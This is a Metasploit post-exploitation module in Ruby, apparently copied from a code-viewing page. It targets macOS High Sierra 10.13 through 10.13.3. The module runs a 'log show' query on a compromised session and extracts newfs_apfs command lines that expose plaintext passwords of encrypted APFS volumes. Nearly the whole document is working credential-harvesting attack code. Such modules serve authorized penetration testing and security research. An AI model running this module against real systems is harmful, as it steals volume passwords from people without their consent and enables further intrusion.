Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
class MetasploitModule < Msf::Post
6

7
  def initialize(info = {})
8
    super(
9
      update_info(
10
        info,
11
        'Name' => 'Mac OS X APFS Encrypted Volume Password Disclosure',
12
        'Description' => %q{
13
          This module exploits a flaw in OSX 10.13 through 10.13.3
14
          that discloses the passwords of encrypted APFS volumes.
15

16
          In OSX a normal user can use the 'log' command to view the system
17
          logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS
18
          volume the password is visible in plaintext within these logs.
19
        },
20
        'License' => MSF_LICENSE,
21
        'References' => [
22
          [ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],
23
          [ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]
24
        ],
25
        'Platform' => 'osx',
26
        'Arch' => ARCH_ALL,
27
        'Author' => [
28
          'Sarah Edwards',  # earliest public discovery
29
          'cbrnrd'          # Metasploit module
30
        ],
31
        'SessionTypes' => [ 'shell', 'meterpreter' ],
32
        'DisclosureDate' => '2018-03-21'
33
      )
34
    )
35
    register_options([
36
      # The command doesn't give volume names, only mount paths (current or previous)
37
      OptString.new('MOUNT_PATH', [false, 'The mount path of the volume to get the password of (Leave blank for all)', ''])
38
    ])
39
  end
40

41
  def check
42
    osx_version = cmd_exec('sw_vers -productVersion')
43
    return Exploit::CheckCode::Vulnerable if osx_version =~ /^10\.13[.[0-3]]?$/
44

45
    Exploit::CheckCode::Safe
46
  end
47

48
  def run
49
    if check == Exploit::CheckCode::Safe
50
      print_error 'This version of OSX is not vulnerable'
51
      return
52
    end
53
    cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"
54
    cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?
55
    vprint_status "Running \"#{cmd}\" on target..."
56
    results = cmd_exec(cmd)
57
    vprint_status "Target results:\n#{results}"
58
    if results.empty?
59
      print_error 'Got no response from target. Stopping...'
60
    else
61
      successful_lines = 0
62
      results.lines.each do |l|
63
        next unless l =~ /newfs_apfs(.*)-S(.*)$/
64

65
        print_good "APFS command found: #{::Regexp.last_match(0)}"
66
        successful_lines += 1
67
      end
68
      print_error 'No password(s) found for any volumes. Exiting...' if successful_lines.zero?
69
    end
70
  end
71
end
72

73